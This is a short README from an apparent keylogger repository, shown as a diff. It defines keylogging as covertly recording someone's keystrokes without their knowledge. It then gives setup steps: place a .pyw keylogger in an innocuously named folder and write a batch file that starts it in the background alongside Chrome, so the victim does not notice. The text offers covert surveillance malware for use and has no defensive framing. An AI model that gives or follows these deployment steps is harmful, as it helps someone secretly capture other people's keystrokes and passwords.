shu8h1t/A-KeyLogger/README.md

 Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
 Data can then be retrieved by the person operating the logging program.
 A keylogger can be either software or hardware.

 1.)
 First use the above code and copy the .pyw file in a folder.
 Supposedly, you named it as Important.
 2.)
-Now create a Notepad File, and write
+To run both Chrome and keylogger in background we have to create a Notepad File, and write

       @echo off
       start "" "c:\important\secret_file.pyw"